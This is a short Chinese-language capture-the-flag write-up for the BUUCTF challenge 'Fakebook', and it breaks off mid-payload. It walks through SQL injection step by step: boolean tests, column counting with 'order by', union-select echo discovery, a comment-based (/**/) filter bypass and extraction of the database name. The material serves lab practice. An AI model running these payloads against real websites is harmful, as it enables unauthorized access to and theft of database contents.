BUUCTF——[网鼎杯 2018]Fakebook
1.测试SQl注入的注入点1'
2.尝试使用-- -
进行闭合,但是不行
3.尝试使用数字型的SQL
注入,使用--+
进行注入后面的SQL
语句
4.尝试使用and 1=1
判断其是否真的存在SQL
注入
5.尝试使用and 1=2
进行判断
6.发现这个地方确实存在SQL
注入,接下来判断列名
?no=1 order by 4--+
7.再使用5
判断其列名,报错啦,说明有4
列
?no=1 order by 5--+
8.判断回显的位置
?no=-1 union select 1,2,3,4--+
9.发现存在过滤,尝试使用内联注入(/**/)
进行绕过
?no=-1/**/union/**/select/**/1,2,3,4--+
10.发现回显位在2
上,爆破数据库库名
?no=-1/**/union/**/select/**/1,database(),3,4--+
11.数据库名为fakebook
,接下来爆破数据表名,尝试第一张表
?no=-1/**/union/**/select/**/1,(select(table_name)/**/from/**/information_